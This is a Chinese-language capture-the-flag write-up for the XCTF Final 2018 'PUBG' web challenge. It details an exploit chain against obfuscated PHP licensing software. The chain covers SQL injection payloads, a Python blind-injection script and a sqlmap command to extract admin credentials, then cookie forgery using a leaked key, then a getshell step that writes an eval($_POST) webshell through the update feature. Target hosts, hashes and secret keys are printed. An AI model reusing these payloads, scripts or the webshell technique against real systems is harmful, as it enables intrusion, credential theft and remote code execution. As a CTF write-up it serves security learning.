XCTF Final Web2 Writeup

BUPG

赛题提供了源码
https://github.com/aye-whitehat/CTF-Collection/blob/master/XCTF%20Final%202018/web/PUBG/www.zip

但是zend加密了,比赛时我们De1ta只解密了部分关键文件,这里感谢提供r3kpig的全部解密文件,大部分队伍都是付费解密的,而且解密后混淆的代码也挺恶心的。。。
https://github.com/aye-whitehat/CTF-Collection/blob/master/XCTF%20Final%202018/web/PUBG/DECODE.zip

环境还没关,复现记得修改下host 159.138.22.212 guaika.txmeili.com

这题我们在比赛的时候利用的漏洞链是:sql注入+cookie伪造+后台getshell

解题思路

sql注入

代码位于 kss_inc/payapi_return2.php
关键代码:
这里的post参数没有调用该框架的sql过滤器,只是进行简单的trim()处理

else if ( $_obfuscate_kYyPkY_PkJKVh4qGjJGIio4� == "e138" )
{
    $_obfuscate_kpGPh4mNh46SkZONh4eLlJU� = "";
    $_obfuscate_k42NkY2RkoiNjJCKlZSKiIg� = trim( $_POST['SerialNo'] );
    $_obfuscate_iJWMjIiVi5OGjJOViY2Li48� = $_obfuscate_k42NkY2RkoiNjJCKlZSKiIg�;
    $_obfuscate_iIuQkYaUioqGlI6IjIuMiI8� = trim( $_POST['Status'] );
    $_obfuscate_jpGJk5SSkJOIk4iQiI_OhpU� = trim( $_POST['Money'] );
    $_obfuscate_lIuQk5OGjpKVjY6UiI_QjJM� = $_obfuscate_jpGJk5SSkJOIk4iQiI_OhpU�;
    $_obfuscate_iImJjYmQjYyOjIuVkIuMjIs� = trim( $_POST['VerifyString'] );

VerifyString的计算规则

else if ( $_obfuscate_kYyPkY_PkJKVh4qGjJGIio4� == "e138" )
{
    $_obfuscate_k4mJh5SPkY6Vh4qHjIaJh44� = TRUE;
    if ( $_obfuscate_iImJjYmQjYyOjIuVkIuMjIs� != strtolower( md5( "SerialNo=".$_obfuscate_k42NkY2RkoiNjJCKlZSKiIg�."&UserID=".$_obfuscate_jI2JlY_QkoeQj5OLjouLlYo�['e138set']."&Money=".$_obfuscate_jpGJk5SSkJOIk4iQiI_OhpU�."&Status=".$_obfuscate_iIuQkYaUioqGlI6IjIuMiI8�."&AttachString=e138&MerchantKey=".$_obfuscate_jI2JlY_QkoeQj5OLjouLlYo�['e138key'] ) ) )
    {
        $_obfuscate_k4mJh5SPkY6Vh4qHjIaJh44� = FALSE;
    }

因为设置了AttachString=e138
所以$_obfuscate_jI2JlY_QkoeQj5OLjouLlYo�['e138set']值为1
所以VerifyString的值为strtolower(md5('SerialNo=1&UserID=1&Money=100&Status=1&AttachString=e138&MerchantKey=1'))
即为ebd95c4233e8c02fe0854306afd71bee

但其实我们只要把参数都找到就ok了,因为不会先验证VerifyString,而是先验证SerialNo和Money参数

造成sql注入的代码如下:

$_obfuscate_lZGQj4iOj4mTlZGNjZGUj5E� = $_obfuscate_jIaUiIeSjZWKlIqLkIqOioc�->_obfuscate_iY6OkJCRkY2PjpCPk5CRkJA�( "select * from kss_tb_order where ordernum='".$_obfuscate_iJWMjIiVi5OGjJOViY2Li48�."'" );

payload:
http://guaika.txmeili.com:8888/kss_inc/payapi_return2.php
注入点在SerialNo

SerialNo=0'or(0)#&UserID=1&Money=100&Status=1&AttachString=e138&MerchantKey=1&VerifyString=ebd95c4233e8c02fe0854306afd71bee
SerialNo=1'or(1)#&UserID=1&Money=100&Status=1&AttachString=e138&MerchantKey=1&VerifyString=ebd95c4233e8c02fe0854306afd71bee
image.png

image.png

尝试注入得到admin的密码
kss_inc/db_function.php 中可以看到登陆逻辑

    if ( empty( $_obfuscate_lIqUlIaMj4aNjJCRkoeJlJE� ) )
    {
        $_obfuscate_h5SQiYyTkY_PjYmRjZWPh4k� = $_obfuscate_jIaUiIeSjZWKlIqLkIqOioc�->_obfuscate_iY6OkJCRkY2PjpCPk5CRkJA�( "select * from kss_tb_manager where id=1" );
        if ( $_obfuscate_lIqUlIaMj4aNjJCRkoeJlJE� != md5( $_obfuscate_h5SQiYyTkY_PjYmRjZWPh4k�['username'].$_obfuscate_h5SQiYyTkY_PjYmRjZWPh4k�['password'] ) )
        {
            _obfuscate_kYyOhouLjo2Gh4eNj4iQlIg�( "你的原始身份效验失败!" );
        }
        $_obfuscate_lI6OiJSPjZWVi5GQhoiPjpU�['level'] = 9;
        $_obfuscate_lI6OiJSPjZWVi5GQhoiPjpU�['powerlist'] = "admin";
    }

表名是 kss_tb_manager,字段是username和password,id是1

注入脚本 aye.py

#! coding:utf-8

import requests
import sys
if sys.getdefaultencoding() != 'utf-8':
    reload(sys)
    sys.setdefaultencoding('utf-8')

def main():
    url="http://guaika.txmeili.com:8888/kss_inc/payapi_return2.php"
    chars = 'abcdefghijklmnopqrstuvwxyz_0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ=+-*/{\}?!:@#$%&()[],. '
    result=''

    for i in range(1,1000):
        i =str(i)
        for j in chars:
            j=ord(j)
            #SerialNo=0'or(1)#&UserID=1&Money=100&Status=1&AttachString=e138&MerchantKey=1&VerifyString=ebd95c4233e8c02fe0854306afd71bee
            payload = """0'or(ascii(substr((select(concat(username,0x3a,password))from(kss_tb_manager)where(id=1)),%s,1))=%s)#"""%(i,j)
            data = {'SerialNo': payload,
                    'UserID' : 1,
                    'Money' : 100,
                    'Status' : 1,
                    'AttachString' : 'e138',
                    'MerchantKey' : 1,
                    'VerifyString' : 'ebd95c4233e8c02fe0854306afd71bee',
                    }
            #print payload
            do_whlie = True
            while  do_whlie:
                try:
                    r=requests.post(url,data=data) 
                    if r.status_code == 200:
                        do_whlie = False
                except Exception as e:
                    print str(e)
            #print r.text
            if '订单金额不符' in r.text:
                result += chr(j)
                #print r.text
                print result   

if __name__ == "__main__":
    main()

image.png

得到账号密码:
axing:8ccf03839a8c63a3a9de17fa5ac6a192
密码在somd5解密得到axing147258
但是登陆不了。。。。赛后跟出题人交流才知道,他把管理员的密码和安全码最后一个字节改了,坑爹的是cmd5和somd5只是取了md5中间的16位进行相似匹配,允许误差
image.png

image.png

所以数据库92结尾的md5是反解不了的

这里也可以用sqlmap直接跑,就是要加上一些参数,不然跑不出来
sqlmap -r burp.txt -p SerialNo --dbms mysql --risk 3 --level 5 --string="订单金额不符" --technique B

POST /kss_inc/payapi_return2.php HTTP/1.1
Host: guaika.txmeili.com:8888
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:49.0) Gecko/20100101 Firefox/49.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 123

SerialNo=0&UserID=1&Money=100&Status=1&AttachString=e138&MerchantKey=1&VerifyString=ebd95c4233e8c02fe0854306afd71bee

cookie伪造

位于kss_inc/function.php

有setcookie_function(包含禁ip的逻辑)

function _obfuscate_jZKVlY6HkYmKkIyRj4qSjIc�( $_obfuscate_iYyTho_HlJCOh4yRj4ePj4k�, $_obfuscate_ipCJlJOSlJSQkYqNlYqKlIs� )
{
    setcookie( $_obfuscate_iYyTho_HlJCOh4yRj4ePj4k�, $_obfuscate_ipCJlJOSlJSQkYqNlYqKlIs�, 0, "/", NULL, NULL, TRUE );
    if ( BINDIP == 1 )
    {
        setcookie( $_obfuscate_iYyTho_HlJCOh4yRj4ePj4k�."_ver", md5( $_obfuscate_ipCJlJOSlJSQkYqNlYqKlIs�.COOKKEY._obfuscate_jZKKjpCGkZSUj4aOiIePlZI�( ) ), 0, "/", NULL, NULL, TRUE );
    }
    else
    {
        setcookie( $_obfuscate_iYyTho_HlJCOh4yRj4ePj4k�."_ver", md5( $_obfuscate_ipCJlJOSlJSQkYqNlYqKlIs�.COOKKEY ), 0, "/", NULL, NULL, TRUE );
    }
    return $_obfuscate_ipCJlJOSlJSQkYqNlYqKlIs�.COOKKEY;
}
位于kss_admin/index.php

调用了setcookie_function
_obfuscate_jZKVlY6HkYmKkIyRj4qSjIc�( "kss_manager", $_obfuscate_i4qGi5WLhoqPkoyGkoiMhpU� );

$_obfuscate_jIaUiIeSjZWKlIqLkIqOioc�->_obfuscate_kpSOj5KVio2Hj4uKj4_KjIY�( "update kss_tb_manager set `linecode`='".$_obfuscate_kI6PjYmLhpGMk4qGjZSHlIg�."',`lastlogintime`='"._obfuscate_jZGJkpOSkY_HiY2HjY2JlIg�( )."',`lastloginip`=".$_obfuscate_kYmJjZOIiZKJioqMkoaGiYk�." where `id`=".$_obfuscate_kY_OlYeUlIiVjo6Hio_MkpI�['id'], "notsync" );
$_obfuscate_i4mRjZCJlZCGk4_UioyHk4k�['logintype'] = 1;
_obfuscate_jYuKk4uOiYmSkpOTj5GUlZA�( $_obfuscate_i4mRjZCJlZCGk4_UioyHk4k� );
$_obfuscate_i4qGi5WLhoqPkoyGkoiMhpU� = $_obfuscate_kY_OlYeUlIiVjo6Hio_MkpI�['id'].",".$_obfuscate_h4eSk4uGiZCKhoyNkIiTlI8�.",".md5( $_obfuscate_jZOIiIiJkJOGiY_KjoaGh4c� ).",".$_obfuscate_kI6PjYmLhpGMk4qGjZSHlIg�;
_obfuscate_jZKVlY6HkYmKkIyRj4qSjIc�( "kss_manager", $_obfuscate_i4qGi5WLhoqPkoyGkoiMhpU� );

其实就是调用了
setcookie_function( "kss_manager",$id.",".$username.",".md5($password).",".$linecode"

然后执行两句setcookie,得到kss_manager和kss_manager_ver两个cookie

setcookie( $_obfuscate_iYyTho_HlJCOh4yRj4ePj4k�, $_obfuscate_ipCJlJOSlJSQkYqNlYqKlIs�, 0, "/", NULL, NULL, TRUE );

setcookie( $_obfuscate_iYyTho_HlJCOh4yRj4ePj4k�."_ver", md5( $_obfuscate_ipCJlJOSlJSQkYqNlYqKlIs�.COOKKEY ), 0, "/", NULL, NULL, TRUE )

并且在 kss_inc/_config.php找到$COOKKEY的值 XIpCcfoe_y43

define( "COOKKEY", "XIpCcfoe_y43" );
define( "COOKKEY2", "MGHOu2m|oXDz" );

也在 kss_inc/db_function.php
找到了$linecode的值 efefefef

    if ( $_obfuscate_lI6OiJSPjZWVi5GQhoiPjpU�['linecode'] != $_obfuscate_h4_NjYiIi46Lh5KHkoaKkZQ�[3] && "efefefef" != $_obfuscate_h4_NjYiIi46Lh5KHkoaKkZQ�[3] && $_obfuscate_lI6OiJSPjZWVi5GQhoiPjpU�['username'] != "test01" )
    {
        _obfuscate_kYyOhouLjo2Gh4eNj4iQlIg�( "您的帐号被挤下线,<a href=index.php target=_top>请重新登陆</a>" );
    }

所以最终的两个cookie的键值分别是

kss_manager
1,axing,8ccf03839a8c63a3a9de17fa5ac6a192,efefefef

kss_manager_ver
md5("1,axing,8ccf03839a8c63a3a9de17fa5ac6a192,efefefef"."XIpCcfoe_y43")
即为
md5("1,axing,8ccf03839a8c63a3a9de17fa5ac6a192,efefefefXIpCcfoe_y43")
即为
b05a94ffcb3da369a828235012990953

成功伪造cookie,访问 kss_admin/admin.php


image.png

浏览器替换cookie


image.png

后台getshell

代码位于 kss_admin/admin_update

这个网站的更新,是从远端主站拉取代码写入本地:

$_obfuscate_koiKkIiPjI6UkYeRlIqNhoc� = _obfuscate_lY6Gk5KMkYmPjIyPhpCOlYc�( "http://api.hphu.com/import/".$_obfuscate_koaSiYqGjIqMiZSLk4uGiZU�.".php?phpver=".PHP_VERSION."&webid=".WEBID."&rid=".time( ), 300 );

我们跟入_obfuscate_lY6Gk5KMkYmPjIyPhpCOlYc�函数
位于第20行,函数中有curl相关的操作

curl_setopt( $_obfuscate_joiNh4aIhouViZGQho_JiI4�, CURLOPT_HEADERFUNCTION, "read_header" );
curl_setopt( $_obfuscate_joiNh4aIhouViZGQho_JiI4�, CURLOPT_WRITEFUNCTION, "read_body" );

看下read_body函数

function read_body( $_obfuscate_joiNh4aIhouViZGQho_JiI4�, $_obfuscate_jJWMiJWJjoyIkYmLjY6VipM� )
{
    global $_obfuscate_ko6MhoiQkJKRlYeVio_JjYo�;
    global $_obfuscate_j4eNjZOQlIuKhoqMj4mOjYs�;
    global $_obfuscate_koaSiYqGjIqMiZSLk4uGiZU�;
    if ( $_obfuscate_ko6MhoiQkJKRlYeVio_JjYo� == 0 && substr( $_obfuscate_jJWMiJWJjoyIkYmLjY6VipM�, 0, 2 ) == "<!" )
    {
        $_obfuscate_j4eNjZOQlIuKhoqMj4mOjYs� = 0;
    }
    $_obfuscate_ko6MhoiQkJKRlYeVio_JjYo� += strlen( $_obfuscate_jJWMiJWJjoyIkYmLjY6VipM� );
    file_put_contents( KSSROOTDIR."kss_tool".DIRECTORY_SEPARATOR."_webup.php", $_obfuscate_jJWMiJWJjoyIkYmLjY6VipM�, FILE_APPEND );
    echo "<script>$('#downsize').html('".$_obfuscate_ko6MhoiQkJKRlYeVio_JjYo�."');</script>";
    echo "<!--  ".str_repeat( " ", 2000 )." -->\r\n";
    ob_flush( );
    flush( );
    return strlen( $_obfuscate_jJWMiJWJjoyIkYmLjY6VipM� );
}

其中read_body函数会将curl到的内容写到 kss_tool/_webup.php

file_put_contents( KSSROOTDIR."kss_tool".DIRECTORY_SEPARATOR."_webup.php", $_obfuscate_jJWMiJWJjoyIkYmLjY6VipM�, FILE_APPEND );

这里我们可以利用代码中的sql过滤器,去触发某个页面的sql报错,从而将php代码回显,从而将恶意代码写入kss_tool/_webup.php,构造webshell

例子:

构造sql报错并回显
http://api.hphu.com/test/kss_admin/index.php?action=aye666%27
image.png
构造更新路径

将报错的页面内容写入 kss_tool/_webup.php

http://guaika.txmeili.com:8888/kss_admin/admin_update.php?pakname=../test/kss_admin/index.php?action=aye666%27
image.png
触发phpinfo
http://guaika.txmeili.com:8888/kss_admin/admin_update.php?pakname=../test/kss_admin/index.php?action='<?php%2520phpinfo();?>
image.png
写shell
http://guaika.txmeili.com:8888/kss_admin/admin_update.php?pakname=../test/kss_admin/index.php?action='<?php%2520eval($_POST[aye]);echo%2520"aye666"?>

image.png

image.png

连接菜刀:http://guaika.txmeili.com:8888/kss_tool/_webup.php

image.png
get flag
image.png

总结

膜拜出题人rr师傅
膜拜De1ta的web师傅们
混淆代码的审计,真TM恶心

推荐阅读更多精彩内容